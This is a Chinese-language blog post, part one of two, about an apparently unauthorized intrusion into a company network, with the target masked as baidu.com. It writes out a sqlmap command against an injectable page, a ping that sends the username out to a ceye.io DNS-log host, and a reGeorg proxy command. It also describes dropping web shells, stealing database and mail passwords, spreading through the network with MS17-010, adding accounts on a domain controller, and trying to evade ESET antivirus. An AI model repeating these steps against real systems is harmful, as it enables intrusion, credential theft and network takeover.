记一次内网实战之不会免杀(上)

  • A+

前段时间看了一下内网渗透,所以想找个环境练习一下,恰好有个兄弟丢了个站点出来,一起“练习内网”,然后就开始了“实战代练”。由于“懒”,所以记录时间和截图有些是补的。

0x00 外网入口点

打开站点(这里用baidu.com替代)看了看,左翻翻翻翻能看到很明显的“注入”点。简单测试一下(and 1=1、1=2),返回不一样,所以sqlmap一把梭。

sqlmap -uhttps://baidu.com/detail.asp?Prod=2222222222 --random-agent  --thread 10

image.png

估计外国站和带宽的原因,跑的很慢。所以走了一遍正常的信息收集:
真实ip:8.8.8.8
Web容器:Microsoft-IIS/7.5
```子域名:
mailserver.baidu.com
mail.baidu.com
端口:80、443
......

```
发现页面登录处admin有个万能密码,登录进去发现只有查看账单的一些功能,所以没用。
C段发现用同一套模板的站,判断是属同一家,所以也注入点跑了一遍。发现这个站跑的比目标站快很多,所以先搞。

image.png

--is-dba为dba权限,故os--shell试试,权限system

image.png

两个站都是08系统+sql注入+dba权限+system权限,外网入口点太轻松,可忽略,抱着学内网的心态。都一样的站,所以搞目标站。

0x01 中转捣鼓

执行回显得很慢,加了threads 10也是很慢。想着上cs和msf,死活不上线,怀疑有杀软或者拦截协议或者其他。ceye试一下

ping %USERNAME%.baidu.ceye.io

image.png

平台有记录,能通外网。但是bitsadmin等下载命令都试了,不上线。走echo写马路线。
先找到web的目录,目录在C盘根目录?

image.png
写了n次马子,愣是没上去,位置不对还是有查杀小马的玩意?嗯,位置不对(猜可能有其他盘,d盘bingo)和好像还有个杀马子的玩意(用了个大小写换下,^是转义字符)。

image.png

image.png

0x02 没思路乱搞系列

查看进程,之前发现有进程有ekrn.exe,egui.exe(eset的进程),不会免杀的我浪死在沙滩上。之前在刀上能执行命令的,这次回去补图居然执行不了命令了。sqlmap那个执行回显太慢,找张内网机子的图补一下(它内网机子都装了eset)。

image.png

翻翻文件(无脑子的翻,不确定哪些重要哪些不重要,感觉都重要),看看有什么数据库密码什么的。找到一些配置文件,发现数据库密码、邮服密码?。(在某个文件夹里面发现同行的脚本,应该没被日穿吧。)

image.png

image.png

image.png

先留着这些账号密码,msf有个sqlserver账号密码之后命令执行的模块和存着之后可能的爆破操作。用reg的http代理试试账密能否搞得到东西,

python reGeorgSocksProxy.py -p 1080 -u http://baidu.com/reGeorg.aspx。

image.png

image.png

再试一波能内网常见的高危:17-010、08-067这类,能直接get的先get(搞不好打到域控啥的重要机子呢)。最后17-010打下内网很多机子,其他的漏洞或者端口扫描就先暂停了。

image.png

白天扫的时候很多机子,晚上再扫发现少了很多,那些应该是员工的机子(下班得关机吧)。
子网掩码255.0.0.0,怀疑不止一个段(其他网卡段还没看)。大概翻了一下,10.1.1到10.1.6的ip都有在用。

image.png

image.png

0x03 eset免杀问题

翻了几个机子的tasklist和尝试ms17-010的反弹,发现eset这个鬼杀软好阻碍干活。上传的工具都死掉了,没搞定这个杀软估计没得搞了。(虽然有个代理可以搞了,但是上个msf有利于后续操作)刚开始还想着添加账户3389过去“手动免杀”。后来找了下加壳在本地测试能文件免杀,但是尝试msf或者cs的又马上杀掉了。于是又找到了个shellter捆绑正常的putty.exe免杀,这会回去复现写文章已经不免杀了。于是有了shellcode免杀操作。

image.png

用了下这个shellcode加载器https://github.com/clinicallyinane/shellcode_launcher/

醉了这都杀。Veil也试过不得,改了下别人的shellcode_launcher,也还是杀了,不会免杀寸步难行,暂时放弃(taskkill掉?别,不过好像也kill不掉,“手动”免杀?别。学一波免杀吧,这flag立了好久,自己改自己写吧,太水都不好意思问大佬。准备闭关)。

0x04 内网乱怼

免杀方面过不了,只有代理脚本搞内网了。整理一下信息,外网的两台web在一个内网上,在对应机子上找到两个sqlserver的账密,17-010能打下的1段机子。目前能拿下的机子:

10.1.1.2(web1,sqlserver)
10.1.1.6(web2)
10.1.1.10(445)
61(445)
22(445)
68(445)
94(445)
105(445)
161(445)
199(445)
......

代理有点问题,时不时中断,有些命令得执行几遍,445在这个内网能收割很多。因为不止一个段,有些机子也不止一个网卡,所以现在只记录10.1.1.0/24的,其他段操作都差不多。基础信息收集那堆就不敲了(能百度谷歌出来的问题不是问题吧,这篇感觉是最友好之一内网的文章),在一波信息收集之后,发现存在域。则直接找域控,在199找到很多用户,这台应该是台域控。

image.png

在10也找到了个krbtgt账户,不同的域名。

image.png

简单检测一下199(当时想着过去手动关闭杀软,搞到域管擦屁股跑路),ping和dnslog测试过,应该不通外网。添加用户晚上3389连了过去。这里也遇到坑,添加的用户登录不进去,net系列命令没有回显。直接添加用户是域用户?后面systeminfo发现个域名,之后登陆的是加个域名才登陆进去。

image.png

不通外网,看到了eset这个杀软。

image.png

刚想手动免杀,然后被大佬笑了,所以卡在eset这玩意上面,抓密码等等操作不了(之前shellter过免杀的还是能抓到hash,hash碰撞也ok,一波偷懒时间过去就凉了),现在就只有全程sqlserver账密和17-010执行命令。

0x03 下篇:鲨鱼师傅的操作

由于某些原因,鲨鱼师傅接手搞了这个内网,请客官们 搬好小板凳观看:
《记一次内网实战之不会免杀(下)》

ps:记得留言点赞分享

相关推荐: ret2dlresolve利用方法

使用场景 一遍运行(延迟绑定技术,只有在第一次调用该函数时才会调用_dll_runtime_resolve函数) 没有输出,没有system函数。 需要: 1.向一个固定地址写入数据(bss段) 2.能够劫持程序执行流 linux下c函数是放在libc库里面的…